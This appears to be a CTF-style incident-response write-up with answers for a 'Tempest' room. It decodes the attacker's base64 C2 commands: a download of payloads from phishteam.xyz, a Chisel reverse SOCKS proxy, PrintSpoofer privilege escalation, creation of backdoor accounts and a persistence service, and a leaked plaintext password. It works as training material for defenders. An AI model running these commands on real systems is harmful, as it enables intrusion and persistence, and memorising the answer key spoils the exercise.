Y2F0IEM6XFVzZXJzXEJlbmltYXJ1XERlc2t0b3BcYXV0b21hdGlvbi5wczEgLSAkdXNlciA9ICJURU1QRVNUXGJlbmltYXJ1Ig0KJHBhc3MgPSAiaW5mZXJub3RlbXBlc3QiDQoNCiRzZWN1cmVQYXNzd29yZCA9IENvbnZlcnRUby1TZWN1cmVTdHJpbmcgJHBhc3MgLUFzUGxhaW5UZXh0IC1Gb3JjZTsNCiRjcmVkZW50aWFsID0gTmV3LU9iamVjdCBTeXN0ZW0uTWFuYWdlbWVudC5BdXRvbWF0aW9uLlBTQ3JlZGVudGlhbCAkdXNlciwgJHNlY3VyZVBhc3N3b3JkDQoNCiMjIFRPRE86IEF1dG9tYXRlIGVhc3kgdGFza3MgdG8gaGFjayB3b3JraW5nIGhvdXJzDQo=
cat C:\Users\Benimaru\Desktop\automation.ps1 - $user = "TEMPEST\benimaru"
$pass = "infernotempest"
$securePassword = ConvertTo-SecureString $pass -AsPlainText -Force;
$credential = New-Object System.Management.Automation.PSCredential $user, $securePassword
## TODO: Automate easy tasks to hack working hours
bmV0c3RhdCAtYW5vIC1wIHRjcCAtIA0KQWN0aXZlIENvbm5lY3Rpb25zDQoNCiAgUHJvdG8gIExvY2FsIEFkZHJlc3MgICAgICAgICAgRm9yZWlnbiBBZGRyZXNzICAgICAgICBTdGF0ZSAgICAgICAgICAgUElEDQogIFRDUCAgICAwLjAuMC4wOjEzNSAgICAgICAgICAgIDAuMC4wLjA6MCAgICAgICAgICAgICAgTElTVEVOSU5HICAgICAgIDg2NA0KICBUQ1AgICAgMC4wLjAuMDo0NDUgICAgICAgICAgICAwLjAuMC4wOjAgICAgICAgICAgICAgIExJU1RFTklORyAgICAgICA0DQogIFRDUCAgICAwLjAuMC4wOjUwNDAgICAgICAgICAgIDAuMC4wLjA6MCAgICAgICAgICAgICAgTElTVEVOSU5HICAgICAgIDU1MDgNCiAgVENQICAgIDAuMC4wLjA6NTM1NyAgICAgICAgICAgMC4wLjAuMDowICAgICAgICAgICAgICBMSVNURU5JTkcgICAgICAgNA0KICBUQ1AgICAgMC4wLjAuMDo1OTg1ICAgICAgICAgICAwLjAuMC4wOjAgICAgICAgICAgICAgIExJU1RFTklORyAgICAgICA0DQogIFRDUCAgICAwLjAuMC4wOjc2ODAgICAgICAgICAgIDAuMC4wLjA6MCAgICAgICAgICAgICAgTElTVEVOSU5HICAgICAgIDQ5NjQNCiAgVENQICAgIDAuMC4wLjA6NDcwMDEgICAgICAgICAgMC4wLjAuMDowICAgICAgICAgICAgICBMSVNURU5JTkcgICAgICAgNA0KICBUQ1AgICAgMC4wLjAuMDo0OTY2NCAgICAgICAgICAwLjAuMC4wOjAgICAgICAgICAgICAgIExJU1RFTklORyAgICAgICA0NzYNCiAgVENQICAgIDAuMC4wLjA6NDk2NjUgICAgICAgICAgMC4wLjAuMDowICAgICAgICAgICAgICBMSVNURU5JTkcgICAgICAgMTIxMg0KICBUQ1AgICAgMC4wLjAuMDo0OTY2NiAgICAgICAgICAwLjAuMC4wOjAgICAgICAgICAgICAgIExJU1RFTklORyAgICAgICAxNzYwDQogIFRDUCAgICAwLjAuMC4wOjQ5NjY3ICAgICAgICAgIDAuMC4wLjA6MCAgICAgICAgICAgICAgTElTVEVOSU5HICAgICAgIDI0MjQNCiAgVENQICAgIDAuMC4wLjA6NDk2NzEgICAgICAgICAgMC4wLjAuMDowICAgICAgICAgICAgICBMSVNURU5JTkcgICAgICAgNjI0DQogIFRDUCAgICAwLjAuMC4wOjQ5Njc2ICAgICAgICAgIDAuMC4wLjA6MCAgICAgICAgICAgICAgTElTVEVOSU5HICAgICAgIDYwOA0KICBUQ1AgICAgMTkyLjE2OC4yNTQuMTA3OjEzOSAgICAwLjAuMC4wOjAgICAgICAgICAgICAgIExJU1RFTklORyAgICAgICA0DQogIFRDUCAgICAxOTIuMTY4LjI1NC4xMDc6NTE4MDIgIDUyLjEzOS4yNTAuMjUzOjQ0MyAgICAgRVNUQUJMSVNIRUQgICAgIDMyMTYNCiAgVENQICAgIDE5Mi4xNjguMjU0LjEwNzo1MTgzOSAgMzQuMTA0LjM1LjEyMzo4MCAgICAgICBUSU1FX1dBSVQgICAgICAgMA0KICBUQ1AgICAgMTkyLjE2OC4yNTQuMTA3OjUxODU4ICAxMDQuMTAxLjIyLjEyODo4MCAgICAgIFRJTUVfV0FJVCAgICAgICAwDQogIFRDUCAgICAxOTIuMTY4LjI1NC4xMDc6NTE4NjAgIDIwLjIwNS4xNDYuMTQ5OjQ0MyAgICAgVElNRV9XQUlUICAgICAgIDANCiAgVENQICAgIDE5Mi4xNjguMjU0LjEwNzo1MTg2MSAgMjA0Ljc5LjE5Ny4yMDA6NDQzICAgICBFU1RBQkxJU0hFRCAgICAgNDM1Mg0KICBUQ1AgICAgMTkyLjE2OC4yNTQuMTA3OjUxODcxICAyMC4xOTAuMTQ0LjE2OTo0NDMgICAgIFRJTUVfV0FJVCAgICAgICAwDQogIFRDUCAgICAxOTIuMTY4LjI1NC4xMDc6NTE4NzYgIDUyLjE3OC4xNy4yOjQ0MyAgICAgICAgRVNUQUJMSVNIRUQgICAgIDQzODgNCiAgVENQICAgIDE5Mi4xNjguMjU0LjEwNzo1MTg3OCAgMjAuNjAuMTc4LjM2OjQ0MyAgICAgICBFU1RBQkxJU0hFRCAgICAgNDM4OA0KICBUQ1AgICAgMTkyLjE2OC4yNTQuMTA3OjUxODgxICA1Mi4xMDkuMTI0LjExNTo0NDMgICAgIEVTVEFCTElTSEVEICAgICA0Mzg4DQogIFRDUCAgICAxOTIuMTY4LjI1NC4xMDc6NTE4ODIgIDUyLjEzOS4xNTQuNTU6NDQzICAgICAgRVNUQUJMSVNIRUQgICAgIDQzODgNCiAgVENQICAgIDE5Mi4xNjguMjU0LjEwNzo1MTg4NCAgNDAuMTE5LjIxMS4yMDM6NDQzICAgICBFU1RBQkxJU0hFRCAgICAgNDM4OA0KICBUQ1AgICAgMTkyLjE2OC4yNTQuMTA3OjUxODk1ICA1Mi4xNTIuOTAuMTcyOjQ0MyAgICAgIEVTVEFCTElTSEVEICAgICA1NTA4DQogIFRDUCAgICAxOTIuMTY4LjI1NC4xMDc6NTE4OTYgIDIwLjQ0LjIyOS4xMTI6NDQzICAgICAgRVNUQUJMSVNIRUQgICAgIDg5MDQNCg==
netstat -ano -p tcp -
Active Connections
Proto Local Address Foreign Address State PID
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 864
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:5040 0.0.0.0:0 LISTENING 5508
TCP 0.0.0.0:5357 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:5985 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:7680 0.0.0.0:0 LISTENING 4964
TCP 0.0.0.0:47001 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:49664 0.0.0.0:0 LISTENING 476
TCP 0.0.0.0:49665 0.0.0.0:0 LISTENING 1212
TCP 0.0.0.0:49666 0.0.0.0:0 LISTENING 1760
TCP 0.0.0.0:49667 0.0.0.0:0 LISTENING 2424
TCP 0.0.0.0:49671 0.0.0.0:0 LISTENING 624
TCP 0.0.0.0:49676 0.0.0.0:0 LISTENING 608
TCP 192.168.254.107:139 0.0.0.0:0 LISTENING 4
TCP 192.168.254.107:51802 52.139.250.253:443 ESTABLISHED 3216
TCP 192.168.254.107:51839 34.104.35.123:80 TIME_WAIT 0
TCP 192.168.254.107:51858 104.101.22.128:80 TIME_WAIT 0
TCP 192.168.254.107:51860 20.205.146.149:443 TIME_WAIT 0
TCP 192.168.254.107:51861 204.79.197.200:443 ESTABLISHED 4352
TCP 192.168.254.107:51871 20.190.144.169:443 TIME_WAIT 0
TCP 192.168.254.107:51876 52.178.17.2:443 ESTABLISHED 4388
TCP 192.168.254.107:51878 20.60.178.36:443 ESTABLISHED 4388
TCP 192.168.254.107:51881 52.109.124.115:443 ESTABLISHED 4388
TCP 192.168.254.107:51882 52.139.154.55:443 ESTABLISHED 4388
TCP 192.168.254.107:51884 40.119.211.203:443 ESTABLISHED 4388
TCP 192.168.254.107:51895 52.152.90.172:443 ESTABLISHED 5508
TCP 192.168.254.107:51896 20.44.229.112:443 ESTABLISHED 8904
cG93ZXJzaGVsbCBpd3IgaHR0cDovL3BoaXNodGVhbS54eXovMDJkY2YwNy9jaC5leGUgLW91dGZpbGUgQzpcVXNlcnNcYmVuaW1hcnVcRG93bmxvYWRzXGNoLmV4ZSAtIA==
powershell iwr http://phishteam.xyz/02dcf07/ch.exe -outfile C:\Users\benimaru\Downloads\ch.exe -
ZGlyIEM6XFVzZXJzXGJlbmltYXJ1XERvd25sb2Fkc1xjaC5leGUgLSANCg0KICAgIERpcmVjdG9yeTogQzpcVXNlcnNcYmVuaW1hcnVcRG93bmxvYWRzDQoNCg0KTW9kZSAgICAgICAgICAgICAgICBMYXN0V3JpdGVUaW1lICAgICAgICAgTGVuZ3RoIE5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgDQotLS0tICAgICAgICAgICAgICAgIC0tLS0tLS0tLS0tLS0gICAgICAgICAtLS0tLS0gLS0tLSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICANCi1hLS0tLSAgICAgICAgNi8yMS8yMDIyICAgMToxNyBBTSAgICAgICAgODIzMDkxMiBjaC5leGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIA0KDQoNCg==
dir C:\Users\benimaru\Downloads\ch.exe -
Directory: C:\Users\benimaru\Downloads
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 6/21/2022 1:17 AM 8230912 ch.exe
that's all :)
search ch.exe
"C:\Users\benimaru\Downloads\ch.exe" client 167.71.199.191:8080 R:socks
MD5=527C71C523D275C8367B67BBEBF48E9F,SHA256=8A99353662CCAE117D2BB22EFD8C43D7169060450BE413AF763E8AD7522D2451,IMPHASH=C7269D59926FA4252270F407E4DAB043
https://www.virustotal.com/gui/file/8a99353662ccae117d2bb22efd8c43d7169060450be413af763e8ad7522d2451
C:\Windows\system32\wsmprovhost.exe -Embedding
https://research.splunk.com/endpoint/2eed004c-4c0d-11ec-93e8-3e22fbd008af/
evilwinrm
The attacker was able to discover a sensitive file inside the machine of the user. What is the password discovered on the aforementioned file?
infernotempest
The attacker then enumerated the list of listening ports inside the machine. What is the listening port that could provide a remote shell inside the machine?
5985
The attacker then established a reverse socks proxy to access the internal services hosted inside the machine. What is the command executed by the attacker to establish the connection?
What is the name of the tool used by the attacker based on the SHA256 hash? Provide the answer in lowercase.
External research needed. Use the SHA256 hash to determine the name of the tool.
Chisel
The attacker then used the harvested credentials from the machine. Based on the succeeding process after the execution of the socks proxy, what service did the attacker use to authenticate?
Format: Answer in lowercase
External research needed. Use the process name to determine the service name.
WinRm
Privilege Escalation - Exploiting Privileges
Privilege Escalation
Based on the collected findings, the attacker gained a stable shell through a reverse socks proxy.
Investigation Guide
With this, we can focus on the following network and endpoint events:
Look for events executed after the successful execution of the reverse socks proxy tool.
Look for potential privilege escalation attempts, as the attacker has already established a persistent low-privilege access.
Significant Data Sources:
Packet Capture
Sysmon
Answer the questions below
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iwr http://phishteam.xyz/02dcf07/spf.exe -outfile spf.exe
search spf.exe
MD5=108DA75DE148145B8F056EC0827F1665,SHA256=8524FBC0D73E711E69D60C64F1F1B7BEF35C986705880643DD4D5E17779E586D,IMPHASH=545A81240793F9CA97306FA5B3AD76DF
https://www.virustotal.com/gui/file/8524fbc0d73e711e69d60c64f1f1b7bef35c986705880643dd4d5e17779e586d
looks like the same steps I'd done it :)
from clement
https://github.com/itm4n/PrintSpoofer
"C:\Users\benimaru\Downloads\spf.exe" -c C:\ProgramData\final.exe
After discovering the privileges of the current user, the attacker then downloaded another binary to be used for privilege escalation. What is the name and the SHA256 hash of the binary?
Based on the SHA256 hash of the binary, what is the name of the tool used?
Format: Answer in lowercase
External research needed. Use the SHA256 hash to determine the name of the exact tool used.
PrintSpoofer
The tool exploits a specific privilege owned by the user. What is the name of the privilege?
External research needed. Read about the tool to see the privilege being abused.
SeImpersonatePrivilege
Then, the attacker executed the tool with another binary to establish a c2 connection. What is the name of the binary?
final.exe
The binary connects to a different port from the first c2 connection. What is the port used?
8080
Actions on Objective - Fully-owned Machine
Fully-Owned Machine
Now, the attacker has gained administrative privileges inside the machine. Find all persistence techniques used by the attacker.
In addition, the unusual executions are related to the malicious C2 binary used during privilege escalation.
Investigation Guide
Now, we can rely on our cheatsheet to investigate events after a successful privilege escalation:
Useful Brim filter to get all HTTP requests related to the malicious C2 traffic : _path=="http" "<replace domain>" id.resp_p==<replace port> | cut ts, host, id.resp_p, uri | sort ts
The attacker gained SYSTEM privileges; now, the user context for each malicious execution blends with NT Authority\System.
All child events of the new malicious binary used for C2 are worth checking.
Significant Data Sources:
Packet Capture
Sysmon
Windows Event Logs
Answer the questions below
_path=="http" "resolvecyber.xyz" id.resp_p==8080 | cut ts, host, id.resp_p, uri | sort ts
d2hvYW1pIC0gbnQgYXV0aG9yaXR5XHN5c3RlbQ0K
whoami - nt authority\system
cHdkIC0gDQpQYXRoICAgICAgICAgICAgICAgDQotLS0tICAgICAgICAgICAgICAgDQpDOlxXaW5kb3dzXHN5c3RlbTMyDQoNCg0K
pwd -
Path
----
C:\Windows\system32
bmV0IHVzZXIgc2h1bmEgcHJpbmNlc3MgLSA=
net user shuna princess -
bmV0IHVzZXJzIC0gDQpVc2VyIGFjY291bnRzIGZvciBcXA0KDQotLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpBZG1pbmlzdHJhdG9yICAgICAgICAgICAgYmVuaW1hcnUgICAgICAgICAgICAgICAgIERlZmF1bHRBY2NvdW50ICAgICAgICAgICANCkd1ZXN0ICAgICAgICAgICAgICAgICAgICByaW11cnUgICAgICAgICAgICAgICAgICAgV0RBR1V0aWxpdHlBY2NvdW50ICAgICAgIA0KVGhlIGNvbW1hbmQgY29tcGxldGVkIHdpdGggb25lIG9yIG1vcmUgZXJyb3JzLg0KDQo=
net users -
User accounts for \\
-------------------------------------------------------------------------------
Administrator benimaru DefaultAccount
Guest rimuru WDAGUtilityAccount
The command completed with one or more errors.
bmV0IHVzZXIgc2h1bmEgLSA=
net user shuna -
bmV0IHVzZXIgc2h1bmEgcHIxbmMzc3MhIC0g
net user shuna pr1nc3ss! -
bmV0IHVzZXJzIC0gDQpVc2VyIGFjY291bnRzIGZvciBcXA0KDQotLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpBZG1pbmlzdHJhdG9yICAgICAgICAgICAgYmVuaW1hcnUgICAgICAgICAgICAgICAgIERlZmF1bHRBY2NvdW50ICAgICAgICAgICANCkd1ZXN0ICAgICAgICAgICAgICAgICAgICByaW11cnUgICAgICAgICAgICAgICAgICAgV0RBR1V0aWxpdHlBY2NvdW50ICAgICAgIA0KVGhlIGNvbW1hbmQgY29tcGxldGVkIHdpdGggb25lIG9yIG1vcmUgZXJyb3JzLg0KDQo=
net users -
User accounts for \\
-------------------------------------------------------------------------------
Administrator benimaru DefaultAccount
Guest rimuru WDAGUtilityAccount
The command completed with one or more errors.
bmV0IHVzZXIgc2hpb24gbTRzdDNyY2gzZiEgLSA=
net user shion m4st3rch3f! -
bmV0IHVzZXJzIC0gDQpVc2VyIGFjY291bnRzIGZvciBcXA0KDQotLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpBZG1pbmlzdHJhdG9yICAgICAgICAgICAgYmVuaW1hcnUgICAgICAgICAgICAgICAgIERlZmF1bHRBY2NvdW50ICAgICAgICAgICANCkd1ZXN0ICAgICAgICAgICAgICAgICAgICByaW11cnUgICAgICAgICAgICAgICAgICAgV0RBR1V0aWxpdHlBY2NvdW50ICAgICAgIA0KVGhlIGNvbW1hbmQgY29tcGxldGVkIHdpdGggb25lIG9yIG1vcmUgZXJyb3JzLg0KDQo=
net users -
User accounts for \\
-------------------------------------------------------------------------------
Administrator benimaru DefaultAccount
Guest rimuru WDAGUtilityAccount
The command completed with one or more errors.
bmV0IHVzZXIgQWRtaW5pc3RyYXRvciBjaDRuZzNkcGFzc3dvcmQhIC0gVGhlIGNvbW1hbmQgY29tcGxldGVkIHN1Y2Nlc3NmdWxseS4NCg0K
net user Administrator ch4ng3dpassword! - The command completed successfully.
Y21kLmV4ZSAvYyBuZXQgdXNlciBzaGlvbiBtNHN0M3JjaDNmISEhIC0g
cmd.exe /c net user shion m4st3rch3f!!! -
bmV0IHVzZXJzIC0gDQpVc2VyIGFjY291bnRzIGZvciBcXA0KDQotLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpBZG1pbmlzdHJhdG9yICAgICAgICAgICAgYmVuaW1hcnUgICAgICAgICAgICAgICAgIERlZmF1bHRBY2NvdW50ICAgICAgICAgICANCkd1ZXN0ICAgICAgICAgICAgICAgICAgICByaW11cnUgICAgICAgICAgICAgICAgICAgV0RBR1V0aWxpdHlBY2NvdW50ICAgICAgIA0KVGhlIGNvbW1hbmQgY29tcGxldGVkIHdpdGggb25lIG9yIG1vcmUgZXJyb3JzLg0KDQo=
net users -
User accounts for \\
-------------------------------------------------------------------------------
Administrator benimaru DefaultAccount
Guest rimuru WDAGUtilityAccount
The command completed with one or more errors.
d2hvYW1pIC9wcml2IC0gDQpQUklWSUxFR0VTIElORk9STUFUSU9ODQotLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQoNClByaXZpbGVnZSBOYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgIERlc2NyaXB0aW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBTdGF0ZSAgDQo9PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PSA9PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT0gPT09PT09PQ0KU2VDcmVhdGVUb2tlblByaXZpbGVnZSAgICAgICAgICAgICAgICAgICAgQ3JlYXRlIGEgdG9rZW4gb2JqZWN0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEVuYWJsZWQNClNlQXNzaWduUHJpbWFyeVRva2VuUHJpdmlsZWdlICAgICAgICAgICAgIFJlcGxhY2UgYSBwcm9jZXNzIGxldmVsIHRva2VuICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBFbmFibGVkDQpTZUxvY2tNZW1vcnlQcml2aWxlZ2UgICAgICAgICAgICAgICAgICAgICBMb2NrIHBhZ2VzIGluIG1lbW9yeSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRW5hYmxlZA0KU2VJbmNyZWFzZVF1b3RhUHJpdmlsZWdlICAgICAgICAgICAgICAgICAgQWRqdXN0IG1lbW9yeSBxdW90YXMgZm9yIGEgcHJvY2VzcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEVuYWJsZWQNClNlVGNiUHJpdmlsZWdlICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFjdCBhcyBwYXJ0IG9mIHRoZSBvcGVyYXRpbmcgc3lzdGVtICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBFbmFibGVkDQpTZVNlY3VyaXR5UHJpdmlsZWdlICAgICAgICAgICAgICAgICAgICAgICBNYW5hZ2UgYXVkaXRpbmcgYW5kIHNlY3VyaXR5IGxvZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRW5hYmxlZA0KU2VUYWtlT3duZXJzaGlwUHJpdmlsZWdlICAgICAgICAgICAgICAgICAgVGFrZSBvd25lcnNoaXAgb2YgZmlsZXMgb3Igb3RoZXIgb2JqZWN0cyAgICAgICAgICAgICAgICAgICAgICAgICAgIEVuYWJsZWQNClNlTG9hZERyaXZlclByaXZpbGVnZSAgICAgICAgICAgICAgICAgICAgIExvYWQgYW5kIHVubG9hZCBkZXZpY2UgZHJpdmVycyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBFbmFibGVkDQpTZVN5c3RlbVByb2ZpbGVQcml2aWxlZ2UgICAgICAgICAgICAgICAgICBQcm9maWxlIHN5c3RlbSBwZXJmb3JtYW5jZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRW5hYmxlZA0KU2VTeXN0ZW10aW1lUHJpdmlsZWdlICAgICAgICAgICAgICAgICAgICAgQ2hhbmdlIHRoZSBzeXN0ZW0gdGltZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEVuYWJsZWQNClNlUHJvZmlsZVNpbmdsZVByb2Nlc3NQcml2aWxlZ2UgICAgICAgICAgIFByb2ZpbGUgc2luZ2xlIHByb2Nlc3MgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBFbmFibGVkDQpTZUluY3JlYXNlQmFzZVByaW9yaXR5UHJpdmlsZWdlICAgICAgICAgICBJbmNyZWFzZSBzY2hlZHVsaW5nIHByaW9yaXR5ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRW5hYmxlZA0KU2VDcmVhdGVQYWdlZmlsZVByaXZpbGVnZSAgICAgICAgICAgICAgICAgQ3JlYXRlIGEgcGFnZWZpbGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEVuYWJsZWQNClNlQ3JlYXRlUGVybWFuZW50UHJpdmlsZWdlICAgICAgICAgICAgICAgIENyZWF0ZSBwZXJtYW5lbnQgc2hhcmVkIG9iamVjdHMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBFbmFibGVkDQpTZUJhY2t1cFByaXZpbGVnZSAgICAgICAgICAgICAgICAgICAgICAgICBCYWNrIHVwIGZpbGVzIGFuZCBkaXJlY3RvcmllcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRW5hYmxlZA0KU2VSZXN0b3JlUHJpdmlsZWdlICAgICAgICAgICAgICAgICAgICAgICAgUmVzdG9yZSBmaWxlcyBhbmQgZGlyZWN0b3JpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEVuYWJsZWQNClNlU2h1dGRvd25Qcml2aWxlZ2UgICAgICAgICAgICAgICAgICAgICAgIFNodXQgZG93biB0aGUgc3lzdGVtICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBFbmFibGVkDQpTZURlYnVnUHJpdmlsZWdlICAgICAgICAgICAgICAgICAgICAgICAgICBEZWJ1ZyBwcm9ncmFtcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRW5hYmxlZA0KU2VBdWRpdFByaXZpbGVnZSAgICAgICAgICAgICAgICAgICAgICAgICAgR2VuZXJhdGUgc2VjdXJpdHkgYXVkaXRzICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEVuYWJsZWQNClNlU3lzdGVtRW52aXJvbm1lbnRQcml2aWxlZ2UgICAgICAgICAgICAgIE1vZGlmeSBmaXJtd2FyZSBlbnZpcm9ubWVudCB2YWx1ZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBFbmFibGVkDQpTZUNoYW5nZU5vdGlmeVByaXZpbGVnZSAgICAgICAgICAgICAgICAgICBCeXBhc3MgdHJhdmVyc2UgY2hlY2tpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRW5hYmxlZA0KU2VVbmRvY2tQcml2aWxlZ2UgICAgICAgICAgICAgICAgICAgICAgICAgUmVtb3ZlIGNvbXB1dGVyIGZyb20gZG9ja2luZyBzdGF0aW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEVuYWJsZWQNClNlTWFuYWdlVm9sdW1lUHJpdmlsZWdlICAgICAgICAgICAgICAgICAgIFBlcmZvcm0gdm9sdW1lIG1haW50ZW5hbmNlIHRhc2tzICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBFbmFibGVkDQpTZUltcGVyc29uYXRlUHJpdmlsZWdlICAgICAgICAgICAgICAgICAgICBJbXBlcnNvbmF0ZSBhIGNsaWVudCBhZnRlciBhdXRoZW50aWNhdGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgRW5hYmxlZA0KU2VDcmVhdGVHbG9iYWxQcml2aWxlZ2UgICAgICAgICAgICAgICAgICAgQ3JlYXRlIGdsb2JhbCBvYmplY3RzICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEVuYWJsZWQNClNlVHJ1c3RlZENyZWRNYW5BY2Nlc3NQcml2aWxlZ2UgICAgICAgICAgIEFjY2VzcyBDcmVkZW50aWFsIE1hbmFnZXIgYXMgYSB0cnVzdGVkIGNhbGxlciAgICAgICAgICAgICAgICAgICAgICBFbmFibGVkDQpTZVJlbGFiZWxQcml2aWxlZ2UgICAgICAgICAgICAgICAgICAgICAgICBNb2RpZnkgYW4gb2JqZWN0IGxhYmVsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRW5hYmxlZA0KU2VJbmNyZWFzZVdvcmtpbmdTZXRQcml2aWxlZ2UgICAgICAgICAgICAgSW5jcmVhc2UgYSBwcm9jZXNzIHdvcmtpbmcgc2V0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEVuYWJsZWQNClNlVGltZVpvbmVQcml2aWxlZ2UgICAgICAgICAgICAgICAgICAgICAgIENoYW5nZSB0aGUgdGltZSB6b25lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBFbmFibGVkDQpTZUNyZWF0ZVN5bWJvbGljTGlua1ByaXZpbGVnZSAgICAgICAgICAgICBDcmVhdGUgc3ltYm9saWMgbGlua3MgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRW5hYmxlZA0KU2VEZWxlZ2F0ZVNlc3Npb25Vc2VySW1wZXJzb25hdGVQcml2aWxlZ2UgT2J0YWluIGFuIGltcGVyc29uYXRpb24gdG9rZW4gZm9yIGFub3RoZXIgdXNlciBpbiB0aGUgc2FtZSBzZXNzaW9uIEVuYWJsZWQNCg==
whoami /priv -
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
========================================= ================================================================== =======
SeCreateTokenPrivilege Create a token object Enabled
SeAssignPrimaryTokenPrivilege Replace a process level token Enabled
SeLockMemoryPrivilege Lock pages in memory Enabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Enabled
SeTcbPrivilege Act as part of the operating system Enabled
SeSecurityPrivilege Manage auditing and security log Enabled
SeTakeOwnershipPrivilege Take ownership of files or other objects Enabled
SeLoadDriverPrivilege Load and unload device drivers Enabled
SeSystemProfilePrivilege Profile system performance Enabled
SeSystemtimePrivilege Change the system time Enabled
SeProfileSingleProcessPrivilege Profile single process Enabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority Enabled
SeCreatePagefilePrivilege Create a pagefile Enabled
SeCreatePermanentPrivilege Create permanent shared objects Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeDebugPrivilege Debug programs Enabled
SeAuditPrivilege Generate security audits Enabled
SeSystemEnvironmentPrivilege Modify firmware environment values Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Enabled
SeManageVolumePrivilege Perform volume maintenance tasks Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeTrustedCredManAccessPrivilege Access Credential Manager as a trusted caller Enabled
SeRelabelPrivilege Modify an object label Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
SeCreateSymbolicLinkPrivilege Create symbolic links Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled
c2MuZXhlIFxcVEVNUEVTVCBjcmVhdGUgVGVtcGVzdFVwZGF0ZSBiaW5wYXRoPSBDOlxQcm9ncmFtRGF0YVxmaW5hbC5leGUgc3RhcnQ9IGF1dG8gLSBbU0NdIENyZWF0ZVNlcnZpY2UgRkFJTEVEIDEwNzM6DQoNClRoZSBzcGVjaWZpZWQgc2VydmljZSBhbHJlYWR5IGV4aXN0cy4NCg0K
sc.exe \\TEMPEST create TempestUpdate binpath= C:\ProgramData\final.exe start= auto - [SC] CreateService FAILED 1073:
The specified service already exists.
